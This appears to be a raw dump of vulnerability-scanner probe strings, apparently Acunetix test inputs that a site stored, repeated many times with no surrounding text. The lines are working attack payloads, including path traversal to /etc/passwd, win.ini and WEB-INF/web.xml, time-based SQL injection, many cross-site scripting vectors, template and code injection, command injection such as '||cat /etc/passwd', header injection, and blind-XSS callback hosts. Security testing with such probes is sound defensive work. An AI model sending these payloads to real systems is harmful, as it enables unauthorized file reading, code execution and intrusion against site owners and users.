..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF\web.xml

1

'|'ld

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1<body onload=prompt(949281)>

1

1

${99167+100380}

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(974998)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

"|"ld

1

1

1

-1)

1

1<img src=xyz OnErRor=prompt(904872)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

)

1&n967565=v906225

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1<img/src=">" onerror=alert(901988)>

-1))

1

'

1

!(()&&!|*|*|

1<ScRiPt%20>prompt(993858)</sCripT>

VQSQjKqA'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

xtALVlHR')

1&lt

^(#$!@#$)(()))******

"

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

testasp.vulnweb.com

J1LiWstT'))

1

1

||cat /etc/passwd

\xf6<img acu onmouseover=prompt(905117) //\xf6>

1

1

1

-1

1

/etc/passwd

1

&dir

'

1<input autofocus onfocus=prompt(988886)>

1

-1)

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

-1))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

<a href='http://www.acunetix.com'>website security</a>

'&dir&'

1

1

http://hitlFTsl8A3Uw.bxss.me/

acunetix_wvs_invalid_filename

OFwXVOkZ'

"&dir&"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}

1

1

p4s3lgrf')

comments

1

|dir

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1_lXHEI <ScRiPt >prompt(987010)</ScRiPt>

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

SCRdgzjj'))

1

'|dir

1

1

'"

1

1

1

comments/.

1

"|dir

<!--

1

1

1'"()&%<ScRiPt >prompt(973399)</ScRiPt>

1

1

1

1

1

1

1

1

1

'"()&%<ScRiPt >prompt(952070)</ScRiPt>

file:///etc/passwd

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1_964597

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

response.write(9236389*9200911)

1

1

1

................windowswin.ini

'+response.write(9236389*9200911)+'

1

1

1

"+response.write(9236389*9200911)+"

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

&cat /etc/passwd&

1

acu6079\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6079

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

acux6669\xc0\xbez1\xc0\xbcz2a\x90bcxuca6669

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(939906)</ScRiPt>

1

1

../../../../../../../../../../etc/passwd

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1<script>prompt(996410)</script>

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

cat /etc/passwd

1<ScRiPt >prompt(987779)</ScRiPt>

1

WEB-INF/web.xml

${100129+99801}

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987397></ScRiPt>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

1

`cat /etc/passwd`

1&n906195=v937438

1<ScRiPt >prompt(912407)</ScRiPt>

)

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

!(()&&!|*|*|

1

|cat /etc/passwd#

1

1

1<video><source onerror="javascript:prompt(908855)">

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

'|'ld

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936811)"></g></svg>

^(#$!@#$)(()))******

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

testasp.vulnweb.com

1

1

-1)

1<div style=width:expression(prompt(965134))>

1

'"()

"|"ld

1<iframe src='data:text/html

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<body onload=prompt(926721)>

'

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(997571)>

1

1

NsClC9IG'

1

1

1

/etc/passwd

"

1<img src=xyz OnErRor=prompt(949076)>

'

1

1

frv0MJdR')

1

http://hitsAUAMe4vVd.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<img/src=">" onerror=alert(920126)>

${@print(md5(acunetix_wvs_security_test))}

1

"

1

1

Q4jBFrOD'))

acunetix_wvs_invalid_filename

1

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<ScRiPt%20>prompt(928769)</sCripT>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

1

comments

-1

1

1&lt

1

&dir

'"

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

\xf6<img acu onmouseover=prompt(954591) //\xf6>

<!--

'&dir&'

1

1

1'"()&%<ScRiPt >prompt(928080)</ScRiPt>

1

1<input autofocus onfocus=prompt(986807)>

comments/.

-1))

1

"&dir&"

1

S345PknS'

1

<a href='http://www.acunetix.com'>website security</a>

file:///etc/passwd

'"()&%<ScRiPt >prompt(992450)</ScRiPt>

|dir

1

tPHNEo5c')

1

1

[url=http://www.acunetix.com]website security[/url]

1

/\../\../\../\../\../\../\../etc/passwd

1_982032

CLdN3TPl'))

1

1

1_juDop <ScRiPt >prompt(927470)</ScRiPt>

'|dir

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

acu5786\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5786

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

acux1093\xc0\xbez1\xc0\xbcz2a\x90bcxuca1093

response.write(9267175*9692660)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

'+response.write(9267175*9692660)+'

1<ScRiPt >prompt(948717)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

"+response.write(9267175*9692660)+"

1<script>prompt(982093)</script>

1

&cat /etc/passwd&

1<ScRiPt >prompt(978050)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?905057></ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(994010)</ScRiPt>

"&cat /etc/passwd&"

1

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

1

1<video><source onerror="javascript:prompt(989053)">

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(903154)"></g></svg>

`cat /etc/passwd`

1

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1<div style=width:expression(prompt(909542))>

1

|cat /etc/passwd#

1

1

-1

${99632+99806}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1<iframe src='data:text/html

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1&n939351=v945738

"|"ld

1

1<body onload=prompt(928193)>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962498)>

1

)

1<img src=xyz OnErRor=prompt(929839)>

1

PDBNBn6Y'

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

testasp.vulnweb.com

'

!(()&&!|*|*|

1

1<img/src=">" onerror=alert(964012)>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

HdIFekVg')

1

'

^(#$!@#$)(()))******

"

1<ScRiPt%20>prompt(933533)</sCripT>

1

1

1

"

VHff31CE'))

/etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

||cat /etc/passwd

1&lt

${@print(md5(acunetix_wvs_security_test))}

1

1

1

-1

1

\xf6<img acu onmouseover=prompt(970415) //\xf6>

&dir

${@print(md5(acunetix_wvs_security_test))}\

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

http://hitGE7P6VOKQQ.bxss.me/

-1)

1

acunetix_wvs_invalid_filename

1

1<input autofocus onfocus=prompt(935205)>

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

-1))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

1

qB2MGFVc'

http://www.acunetix.tst

"&dir&"

1'"()&%<ScRiPt >prompt(925630)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

'"

1

<a href='http://www.acunetix.com'>website security</a>

1

|dir

MhEzCCSU')

'"()&%<ScRiPt >prompt(917782)</ScRiPt>

comments/.

[url=http://www.acunetix.com]website security[/url]

1

1

<!--

file:///etc/passwd

1

'|dir

1

1_942321

fChkNJV8'))

1

1

1_JlVAl <ScRiPt >prompt(910126)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

"|dir

1

1

1

WEB-INF/web.xml

1

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acu1436\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1436

response.write(9922552*9980230)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'+response.write(9922552*9980230)+'

1

1

acux7786\xc0\xbez1\xc0\xbcz2a\x90bcxuca7786

&cat /etc/passwd&

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+response.write(9922552*9980230)+"

1<ScRiPt >prompt(993509)</ScRiPt>

1

1

1

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<script>prompt(939733)</script>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

"&cat /etc/passwd&"

1

1

1

1<ScRiPt >prompt(911531)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

cat /etc/passwd

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?994082></ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(948330)</ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

`cat /etc/passwd`

WEB-INF/web.xml

1

1

1

1<video><source onerror="javascript:prompt(933222)">

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(976995)"></g></svg>

WEB-INF\web.xml

1

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<div style=width:expression(prompt(944976))>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${99791+99882}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

1<iframe src='data:text/html

-1

1&n957925=v986934

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1)

1<body onload=prompt(996035)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(975919)>

-1))

1

testasp.vulnweb.com

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(952803)>

s3EJ5BNd'

"

'

1

/etc/passwd

^(#$!@#$)(()))******

1

1<img/src=">" onerror=alert(989972)>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

||cat /etc/passwd

1

c8QKG9jn')

"

1

1

1

1

1<ScRiPt%20>prompt(962970)</sCripT>

1

${@print(md5(acunetix_wvs_security_test))}

yjBymyNb'))

&dir

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1&lt

1

http://hit4HHiSHEkjN.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

'&dir&'

1

-1

\xf6<img acu onmouseover=prompt(951441) //\xf6>

1

acunetix_wvs_invalid_filename

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

"&dir&"

1<input autofocus onfocus=prompt(943229)>

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

http://www.acunetix.tst

-1))

|dir

<a href='http://www.acunetix.com'>website security</a>

'"

comments

1

<!--

xfwCjFHc'

1

1'"()&%<ScRiPt >prompt(969698)</ScRiPt>

[url=http://www.acunetix.com]website security[/url]

5gB0vo9n')

1

comments/.

'|dir

1

file:///etc/passwd

1

'"()&%<ScRiPt >prompt(978418)</ScRiPt>

1_01NsF <ScRiPt >prompt(963441)</ScRiPt>

1

zR4mPoBw'))

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1

1

1

1

1_907913

1

WEB-INF/web.xml

1

1

1

1

1

WEB-INF\web.xml

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

response.write(9815589*9030557)

1

'+response.write(9815589*9030557)+'

................windowswin.ini

1

1

"+response.write(9815589*9030557)+"

1

..\..\..\..\..\..\..\..\windows\win.ini

1

&cat /etc/passwd&

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acu6191\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6191

'&cat /etc/passwd&'

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acux3806\xc0\xbez1\xc0\xbcz2a\x90bcxuca3806

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1<ScRiPt >prompt(993416)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<script>prompt(955941)</script>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1<ScRiPt >prompt(959566)</ScRiPt>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942885></ScRiPt>

1

../../../../../../../../../../etc/passwd.jpg

WEB-INF/web.xml

1

|cat /etc/passwd#

1

1<ScRiPt >prompt(956714)</ScRiPt>

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

'|'ld

1

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<video><source onerror="javascript:prompt(925651)">

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

"|"ld

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(913666)"></g></svg>

1

${99975+99996}

-1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<div style=width:expression(prompt(979723))>

1

1&n976413=v932749

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<iframe src='data:text/html

-1)

1

)

1some_inexistent_file_with_long_name%00.jpg

1

-1))

1<body onload=prompt(973544)>

'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

XXc3nUxM'

1

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(949579)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

xt5Aj9Ea')

'

testasp.vulnweb.com

^(#$!@#$)(()))******

||cat /etc/passwd

1

1<img src=xyz OnErRor=prompt(902598)>

/etc/passwd

1

1

1

"

V443q5ME'))

1

1

1

1

1<img/src=">" onerror=alert(975953)>

&dir

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}

http://hitUpsDdU67h6.bxss.me/

-1

'&dir&'

1

1

1<ScRiPt%20>prompt(977371)</sCripT>

acunetix_wvs_invalid_filename

1

1

-1)

${@print(md5(acunetix_wvs_security_test))}\

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1&lt

1

"&dir&"

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

\xf6<img acu onmouseover=prompt(920853) //\xf6>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

1

1<input autofocus onfocus=prompt(973621)>

|dir

1

http://www.acunetix.tst

comments/.

1

mUekGWhN'

1'"()&%<ScRiPt >prompt(946167)</ScRiPt>

'"

<a href='http://www.acunetix.com'>website security</a>

'|dir

1

1

[url=http://www.acunetix.com]website security[/url]

'"()&%<ScRiPt >prompt(937065)</ScRiPt>

LZmmrUF7')

<!--

file:///etc/passwd

"|dir

1

1

1

1_952784

1_rfQ4r <ScRiPt >prompt(911030)</ScRiPt>

1

1

O0fOS3iI'))

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acu5388\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5388

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acux7118\xc0\xbez1\xc0\xbcz2a\x90bcxuca7118

response.write(9759741*9968715)

1

1<ScRiPt >prompt(957743)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'+response.write(9759741*9968715)+'

1

1<script>prompt(977542)</script>

"+response.write(9759741*9968715)+"

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt >prompt(986077)</ScRiPt>

1

1

'&cat /etc/passwd&'

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?980855></ScRiPt>

1

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(977663)</ScRiPt>

WEB-INF/web.xml

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1

1

1<video><source onerror="javascript:prompt(901597)">

1

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907365)"></g></svg>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

1

1

1<div style=width:expression(prompt(971301))>

1

1

'|'ld

1

../../../../../../../../../../etc/passwd.jpg

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"|"ld

1

1

1<iframe src='data:text/html

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<body onload=prompt(953432)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100460+99318}

-1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n991822=v909940

1

'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918230)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

)

1

1<img src=xyz OnErRor=prompt(975171)>

"

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

aJCxXyvm'

'"()

1<img/src=">" onerror=alert(999350)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

testasp.vulnweb.com

'

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

||cat /etc/passwd

PgfNved1')

1

1<ScRiPt%20>prompt(923661)</sCripT>

1

1

1

&dir

1

JwD2Vf76'))

"

1

/etc/passwd

1

1

1&lt

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}

'&dir&'

-1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

comments

http://hitiDgmOAAcOw.bxss.me/

\xf6<img acu onmouseover=prompt(965790) //\xf6>

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1)

1

"&dir&"

1<input autofocus onfocus=prompt(922513)>

1

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

|dir

1

1

-1))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

<a href='http://www.acunetix.com'>website security</a>

comments/.

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://www.acunetix.tst

u2yjLVb7'

[url=http://www.acunetix.com]website security[/url]

1

1

1

'|dir

'"

kDjEvuRO')

1

1

1_IxmRN <ScRiPt >prompt(984275)</ScRiPt>

1

1'"()&%<ScRiPt >prompt(941568)</ScRiPt>

1

8OKYyIic'))

"|dir

file:///etc/passwd

<!--

1

1

1

1

1

'"()&%<ScRiPt >prompt(999260)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

1_953562

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

response.write(9813150*9462780)

1

'+response.write(9813150*9462780)+'

1

1

"+response.write(9813150*9462780)+"

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu2662\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2662

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

acux7246\xc0\xbez1\xc0\xbcz2a\x90bcxuca7246

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<ScRiPt >prompt(988960)</ScRiPt>

1

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<script>prompt(985381)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

